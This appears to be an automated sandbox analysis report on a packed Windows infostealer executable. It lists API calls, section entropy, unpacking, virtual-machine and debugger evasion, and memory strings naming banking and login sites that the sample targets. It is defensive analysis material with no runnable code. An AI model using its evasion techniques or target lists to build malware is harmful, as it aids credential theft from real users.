Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29070 NtEnumerateKey,	0_2_00E29070
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29028 NtCreateKey,	0_2_00E29028
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E291E0 NtQueryMultipleValueKey,	0_2_00E291E0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29180 NtNotifyChangeKey,	0_2_00E29180
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E292E0 NtWriteFile,	0_2_00E292E0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E292C4 NtTerminateProcess,	0_2_00E292C4
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E2927C NtSetInformationKey,	0_2_00E2927C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E293F4 NtDuplicateObject,	0_2_00E293F4
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E2936C NtQueryDirectoryFile,	0_2_00E2936C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29338 NtQueryObject,	0_2_00E29338
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E294EC NtUnlockFile,	0_2_00E294EC
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E2948C NtLockFile,	0_2_00E2948C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E2943C NtQueryVolumeInformationFile,	0_2_00E2943C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E295EC NtCreateSection,	0_2_00E295EC
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E2958C NtMapViewOfSection,	0_2_00E2958C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29558 NtQuerySection,	0_2_00E29558
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E2953C NtUnmapViewOfSection,	0_2_00E2953C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29684 NtQueryInformationFile,	0_2_00E29684
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E29778 NtOpenFile,	0_2_00E29778

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: 0_2_00E87CA4: CreateFileA,DeviceIoControl,

0_2_00E87CA4

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00DB4EA0	0_2_00DB4EA0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D814B0	0_2_00D814B0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D916A0	0_2_00D916A0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D8BBA0	0_2_00D8BBA0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EE0048	0_2_00EE0048
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00ED805C	0_2_00ED805C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EDC01C	0_2_00EDC01C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00DB4020	0_2_00DB4020
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00ED613C	0_2_00ED613C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D883CF	0_2_00D883CF
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D7A340	0_2_00D7A340
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA2498	0_2_00EA2498
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D96400	0_2_00D96400
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E1C97C	0_2_00E1C97C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EC2958	0_2_00EC2958
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E84AC8	0_2_00E84AC8
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA6AC8	0_2_00EA6AC8
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D94A00	0_2_00D94A00
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EAAA18	0_2_00EAAA18
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D7EA20	0_2_00D7EA20
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D78B60	0_2_00D78B60
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D72B10	0_2_00D72B10
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E64C28	0_2_00E64C28
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D94DB0	0_2_00D94DB0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E84D94	0_2_00E84D94
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D7AD40	0_2_00D7AD40
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00DACD00	0_2_00DACD00
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EAEEB0	0_2_00EAEEB0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EC2E80	0_2_00EC2E80
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EAAF48	0_2_00EAAF48
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E84F24	0_2_00E84F24
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D71040	0_2_00D71040
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D77006	0_2_00D77006
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E87264	0_2_00E87264
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D953A0	0_2_00D953A0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00ECF434	0_2_00ECF434
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D73590	0_2_00D73590
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D79560	0_2_00D79560
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E87600	0_2_00E87600
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00ED98C4	0_2_00ED98C4
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E5582C	0_2_00E5582C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00ED580C	0_2_00ED580C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D87900	0_2_00D87900
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E87A40	0_2_00E87A40
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA7A04	0_2_00EA7A04
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E39BB0	0_2_00E39BB0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D7BCF0	0_2_00D7BCF0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EE1C38	0_2_00EE1C38
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E43C0C	0_2_00E43C0C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00DB5DC0	0_2_00DB5DC0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EDBD68	0_2_00EDBD68
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00D77E50	0_2_00D77E50
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00ECDE4C	0_2_00ECDE4C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E11FF0	0_2_00E11FF0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EBBFF0	0_2_00EBBFF0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_02B84207	0_2_02B84207
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_02B85276	0_2_02B85276
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_02B85119	0_2_02B85119

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: String function: 00DDAD9C appears 123 times

Source: nyojpsdfkawed.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: nyojpsdfkawed.exe	Static PE information: Section: ZLIB complexity 0.9982136051829268
Source: nyojpsdfkawed.exe	Static PE information: Section: ZLIB complexity 0.9990234375
Source: nyojpsdfkawed.exe	Static PE information: Section: .data ZLIB complexity 0.996156411432844

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nyojpsdfkawed.exe, 00000000.00000003.859481667.00000000009F0000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.858861378.0000000003D46000.00000004.00000800.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.884369800.0000000003D53000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: nyojpsdfkawed.exe	ReversingLabs: Detection: 84%
Source: nyojpsdfkawed.exe	Virustotal: Detection: 76%

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

File read: C:\Users\user\Desktop\nyojpsdfkawed.exe

Jump to behavior

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: nyojpsdfkawed.exe

Static file information: File size 1315328 > 1048576

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Unpacked PE file: 0.2.nyojpsdfkawed.exe.d70000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;

Source: nyojpsdfkawed.exe	Static PE information: section name:
Source: nyojpsdfkawed.exe	Static PE information: section name:
Source: nyojpsdfkawed.exe	Static PE information: section name:
Source: nyojpsdfkawed.exe	Static PE information: section name:
Source: nyojpsdfkawed.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E769C4 push 00E76A51h; ret	0_2_00E76A49
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EC20E8 push 00EC2114h; ret	0_2_00EC210C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA80E0 push 00EA81A6h; ret	0_2_00EA819E
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E940D0 push 00E940FCh; ret	0_2_00E940F4
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00DFC088 push 00DFC0CBh; ret	0_2_00DFC0C3
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EC208C push 00EC20C4h; ret	0_2_00EC20BC
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28080 push 00E28145h; ret	0_2_00E2813D
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E98070 push 00E9809Ch; ret	0_2_00E98094
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E38078 push 00E380D1h; ret	0_2_00E380C9
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E281FC push 00E28228h; ret	0_2_00E28220
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E281C4 push 00E281F0h; ret	0_2_00E281E8
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E7E1B4 push 00E7E1E0h; ret	0_2_00E7E1D8
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E8418C push 00E841B8h; ret	0_2_00E841B0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA6180 push 00EA61ACh; ret	0_2_00EA61A4
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E6C190 push ecx; mov dword ptr [esp], ecx	0_2_00E6C194
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28164 push 00E28190h; ret	0_2_00E28188
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA6148 push 00EA6174h; ret	0_2_00EA616C
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00DF0104 push ecx; mov dword ptr [esp], edx	0_2_00DF0109
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA6110 push 00EA613Ch; ret	0_2_00EA6134
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA2114 push 00EA2140h; ret	0_2_00EA2138
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E282CC push 00E282F8h; ret	0_2_00E282F0
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E022D0 push 00E022FCh; ret	0_2_00E022F4
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E022A0 push 00E022CDh; ret	0_2_00E022C5
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E2A2B4 push 00E2A2F4h; ret	0_2_00E2A2EC
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28294 push 00E282C0h; ret	0_2_00E282B8
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00EA2240 push 00EA226Ch; ret	0_2_00EA2264
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E02250 push 00E0229Ch; ret	0_2_00E02294
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E9222C push 00E92258h; ret	0_2_00E92250
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28234 push 00E28260h; ret	0_2_00E28258
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00DDC3EC push 00DDC418h; ret	0_2_00DDC410
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_00E28384 push 00E283B0h; ret	0_2_00E283A8

Source: nyojpsdfkawed.exe	Static PE information: section name: entropy: 7.997908308660158
Source: nyojpsdfkawed.exe	Static PE information: section name: entropy: 7.932863830219209
Source: nyojpsdfkawed.exe	Static PE information: section name: entropy: 7.955753340921395
Source: nyojpsdfkawed.exe	Static PE information: section name: entropy: 7.8544979878199355
Source: nyojpsdfkawed.exe	Static PE information: section name: .data entropy: 7.979325866092819

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe TID: 7020	Thread sleep count: 307 > 30	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe TID: 7100	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe TID: 6400	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: 0_2_00E01490 FindFirstFileW,

0_2_00E01490

Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: nyojpsdfkawed.exe, 00000000.00000003.964745248.000000000096E000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.857103718.000000000096E000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.936548555.000000000096E000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030160801.000000000093C000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000003.1029083083.000000000093C000.00000004.00000020.00020000.00000000.sdmp, nyojpsdfkawed.exe, 00000000.00000002.1030260579.000000000096E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000DD0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: &VBoxService.exe
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000DD0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: VBoxService.exe
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000F1A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000F1A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000DD0000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: VMWare
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: nyojpsdfkawed.exe, 00000000.00000002.1030790383.0000000000F1A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: nyojpsdfkawed.exe, 00000000.00000003.885237988.0000000003D76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: 0_2_00DBA9E0 LdrInitializeThunk,

0_2_00DBA9E0

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_02B8814B mov eax, dword ptr fs:[00000030h]		0_2_02B8814B
Source: C:\Users\user\Desktop\nyojpsdfkawed.exe	Code function: 0_2_02B87E82 mov eax, dword ptr fs:[00000030h]		0_2_02B87E82

Source: C:\Users\user\Desktop\nyojpsdfkawed.exe

Code function: 0_2_00E86268 cpuid

0_2_00E86268

